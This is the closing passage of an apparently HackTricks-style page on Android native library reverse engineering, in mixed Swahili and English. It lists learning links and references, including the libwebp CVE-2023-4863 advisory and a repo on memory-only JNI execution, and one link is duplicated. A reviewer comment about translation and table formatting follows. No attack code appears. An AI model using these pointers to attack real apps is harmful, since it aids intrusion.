- **Debugging Native Libraries:** [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
- **Kujifunza ARM Assembly:** [Azeria Labs ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/)
- **JNI & NDK Nyaraka:** [Oracle JNI Spec](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) · [Android JNI Tips](https://developer.android.com/training/articles/perf-jni) · [NDK Guides](https://developer.android.com/ndk/guides/)
- **Kudebuga Native Libraries:** [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
### References
### Marejeo
- Frida 16.x change-log (Android hooking, tiny-function relocation) [frida.re/news](https://frida.re/news/)
- NVD advisory for `libwebp` overflow CVE-2023-4863 [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863)
- SoTap: Lightweight in-app JNI (.so) behavior logger [github.com/RezaArbabBot/SoTap](https://github.com/RezaArbabBot/SoTap)
- SoTap Releases [github.com/RezaArbabBot/SoTap/releases](https://github.com/RezaArbabBot/SoTap/releases)
- How to work with SoTap? [t.me/ForYouTillEnd/13](https://t.me/ForYouTillEnd/13)
- [CoRPhone — JNI memory-only execution pattern and packaging](https://github.com/0xdevil/corphone)
{{#include ../../banners/hacktricks-training.md}}
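Review bot: as in the previous hunk, translated paragraphs are replaced by English here ("Unapogundua *third-party* `.so` files..." becomes "When you spot *third-party* `.so` files...", and the three PAC/BTI, MTE and LLVM Obfuscator bullets go from Swahili to English) while headings in the same hunk are translated the other way ("Resources" to "Rasilimali", "References" to "Marejeo"); pick one direction for the file. The new "See also" paragraph and the PAC bullet lost hyphens ("inmemory", "ondisk", "readytouse", "PACrelated"). The unchanged libwebp row of the CVE table ends with a stray extra cell ("...or patching.| |"), which gives that row a fifth column in a four-column table; drop the trailing "| |".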